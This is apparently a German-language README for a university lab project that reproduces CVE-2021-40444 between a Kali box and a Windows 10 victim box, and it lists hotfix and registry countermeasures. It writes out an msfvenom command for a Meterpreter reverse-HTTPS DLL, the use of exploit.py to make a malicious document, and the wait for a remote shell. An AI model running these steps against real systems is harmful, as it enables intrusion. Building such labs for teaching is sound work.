TIC4301_Projekt
TIC4301 Projekt - CVE-2021-40444
Laden Sie die folgenden Vagrant-Boxen herunter:
Kali - https://drive.google.com/file/d/1RegQcT2jjFoaQRgLjXDYl4iS0HNt_mU2/view?usp=sharing
Win10 - https://drive.google.com/file/d/1zcLertRoI-FrHDkRq1NO-KHaF88bMv6e/view?usp=sharing
Importieren Sie die Boxen mit den folgenden Befehlen über Vagrant:
- vagrant box add kali_package.box
- vagrant box add victim_package.box
- vagrant init kali_package.box
- vagrant init victim_package.box
- vagrant up
Einrichtung (Win10):
- Melden Sie sich in der Win10-Box als Administrator mit dem Passwort vagrant an.
- Klicken Sie mit der rechten Maustaste auf script.ps1 auf dem Desktop und führen Sie es mit PowerShell aus. (Lassen Sie dieses Fenster geöffnet)
- Führen Sie ipconfig.exe aus und ermitteln Sie die Adresse dieses Hosts.
Einrichtung (Kali):
- cd Desktop/CVE-2021-40444.
- Generieren Sie Ihre schädliche DLL mit msfvenom. # msfvenom -p windows/x64/meterpreter/reverse_https LHOST=eth1 LPORT=443 -f dll -o test/shell.dll
- Starten Sie einen Listener in Metasploit.
- Generieren Sie das schädliche Dokument. # python3 exploit.py generate test/calc.dll http://
- Besuchen Sie http://<win 10 IP>/upload und laden Sie die Datei hoch.
- Warten Sie auf die Shell.
Gegenmaßnahmen:
- Installieren Sie das Hotfix KB5005565.
- Bearbeiten Sie die Windows-Registrierung mit patch.reg aus dem Repository.